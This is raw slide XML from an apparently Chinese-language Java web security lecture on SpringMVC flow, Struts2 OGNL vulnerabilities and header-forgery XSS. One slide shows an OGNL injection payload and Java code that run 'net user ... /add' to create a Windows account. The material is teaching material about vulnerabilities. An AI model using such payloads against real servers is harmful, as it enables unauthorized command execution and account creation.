            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1.用户发送请求给服务器。url：user.do</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.服务器收到请求。发现DispatchServlet可以处理。于是调用</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>DispatchServlet。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3.DispatchServlet内部，通过HandleMapping检查这个url有没</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>有对应的Controller。如果有，则调用Controller。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>4.Controller开始执行。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>MVC安全</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SpringMVC框架内部流程：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>5.Controller执行完毕后，如果返回字符串，则ViewResolver将字</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>符串转化成相应的视图对象；如果返回ModelAndView对象，该</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>对象本身就包含了视图对象信息。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>6.DispatchServlet将执视图对象中的数据，输出给服务器。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>7.服务器将数据输出给客户端。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>MVC安全</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Struts2 OGNL:</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>OGNL全称是Object-Graph  Navigation  Language(对象图形导</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>航语言)，Ognl同时也是Struts2默认的表达式语言。每一次</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Struts2的命令执行漏洞都是通过OGNL去执行的。在写这文档之</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>前，乌云的drops已有可够参考的Ognl文章了</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>http://drops.wooyun.org/papers/340。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1、能够访问对象的普通方法</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2、能够访问类的静态属性和静态方法</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3、强大的操作集合类对象的能力</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>4、支持赋值操作和表达式串联</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>5、访问OGNL上下文和ActionContext</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>MVC安全</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Struts2 OGNL:</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Ognl可以调用静态方法，比如表达式使用表达式去调用runtime执</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>行命令执行：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>@java.lang.Runtime@getRuntime().exec('net user selina 123 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>/add')</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>而在Java当中静态调用命令行的方式：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>java.lang.Runtime.*getRuntime*().exec("net user selina 123 /add");</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>MVC安全</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Struts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>漏洞：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>由于Struts2默认使用的是OGNL表达式，而OGNL表达式有着访</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>问对象的普通方法和静态方法的能力。开发者无视安全问题大量的</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>使用Ognl表达式这正是导致Struts2漏洞源源不断的根本原因。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>MVC安全</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Struts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>漏洞：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>由于Struts2默认使用的是OGNL表达式，而OGNL表达式有着访</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>问对象的普通方法和静态方法的能力。开发者无视安全问题大量的</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>使用Ognl表达式这正是导致Struts2漏洞源源不断的根本原因。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2571750" y="357505"/>
            <a:ext cx="3999865" cy="442849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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>MVC安全</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Struts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>漏洞：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Struts2的核心是使用的webwork框架,处理 action时通过调用底</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>层的getter/setter方法来处理http的参数,它将每个http参数声明</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>为一个ONGL语句。当我们提交一个http参数:　　　　</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>?user.address.city=Bishkek&amp;user['favoriteDrink']=kumys </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>　　ONGL将它转换为:</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>　　　　action.getUser().getAddress().setCity("Bishkek") </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>　　　　action.getUser().setFavoriteDrink("kumys")</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CS交互安全</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>Request &amp; Response(请求与响应)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>历史总是惊人的相似</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>请求头信息伪造XSS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>关于伪造问题我是这样理解的:发送Http请求是客户端的主动行为，</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>服务器端通过ServerSocket监听并按照Http协议去解析客户端的</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>请求行为。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>所以请求头当中的信息可能并不一定遵循标准Http协议。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>MVC安全</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Struts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>漏洞：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
